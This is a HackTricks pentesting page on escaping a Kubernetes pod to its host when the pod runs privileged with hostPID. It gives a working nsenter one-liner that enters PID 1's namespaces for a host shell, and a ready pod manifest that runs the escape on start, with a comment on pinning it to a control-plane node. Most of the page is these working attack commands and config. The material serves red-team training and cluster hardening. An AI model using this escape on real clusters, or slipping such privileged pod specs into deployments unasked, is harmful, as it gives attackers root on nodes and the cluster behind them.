Skip to content

Latest commit

 

History

History
63 lines (47 loc) · 3.35 KB

File metadata and controls

63 lines (47 loc) · 3.35 KB

Pod Escape Privileges

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}

Privileged and hostPID

With these privileges you will have access to the hosts processes and enough privileges to enter inside the namespace of one of the host processes.
Note that you can potentially not need privileged but just some capabilities and other potential defenses bypasses (like apparmor and/or seccomp).

Just executing something like the following will allow you to escape from the pod:

nsenter --target 1 --mount --uts --ipc --net --pid -- bash

Configuration example:

apiVersion: v1
kind: Pod
metadata:
  name: priv-and-hostpid-exec-pod
  labels:
    app: pentest
spec:
  hostPID: true
  containers:
  - name: priv-and-hostpid-pod
    image: ubuntu
    tty: true
    securityContext:
      privileged: true
    command: [ "nsenter", "--target", "1", "--mount", "--uts", "--ipc", "--net", "--pid", "--", "bash" ]
  #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}